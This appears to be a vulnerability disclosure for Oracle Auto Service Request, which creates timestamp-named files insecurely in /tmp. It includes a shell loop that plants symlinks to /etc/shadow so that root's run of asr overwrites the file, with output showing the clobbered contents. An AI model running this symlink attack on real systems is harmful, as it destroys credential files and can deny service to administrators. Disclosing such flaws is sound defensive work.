Oracle Auto Service Request creates files insecurely in /tmp using time stamps instead of mkstemp(). Due to this, it is possible to clobber root owned files and possibly cause a denial of service condition or worse.
3201569e185a30abb901fe01ff0684a58d22ab75b3d2eb41883373ead659d4e8
Oracle Auto Service Request software package creates files insecurely in /tmp using time stamps instead of mkstemp(). You can clobber root owned files if you know when around the time the root administrator will be using this utility.
[larry@oracle-os-lab01 tmp]$ for x in `seq 500 999`; do ln -s /etc/shadow /tmp/status1_020213003$x; done
root executes the asr command:
[root@oracle-os-lab01 bin]# ./asr
register OR register [-e asr-manager-relay-url]: register ASR
unregister : unregister ASR
show_reg_status : show ASR registration status
test_connection : test connection to Oracle
.
.
.
version : show asr script version
exit
help : display a list of commands
? : display a list of commands
asr>
/etc/shadow is now overwritten with the contents of /tmp/status1_020213003722
root # cat /etc/shadow
id State Bundle
68 ACTIVE com.sun.svc.asr.sw_4.3.1
Fragments=69, 70
69 RESOLVED com.sun.svc.asr.sw-frag_4.3.1
Master=68
70 RESOLVED com.sun.svc.asr.sw-rulesdefinitions_4.3.1
Master=68
72 ACTIVE com.sun.svc.asr.sw.http.AsrHttpReceiver_1.0.0
Fragments=73
73 RESOLVED com.sun.svc.asr.sw.http-frag_1.0.0
Master=72
67 ACTIVE com.sun.svc.ServiceActivation_4.3.1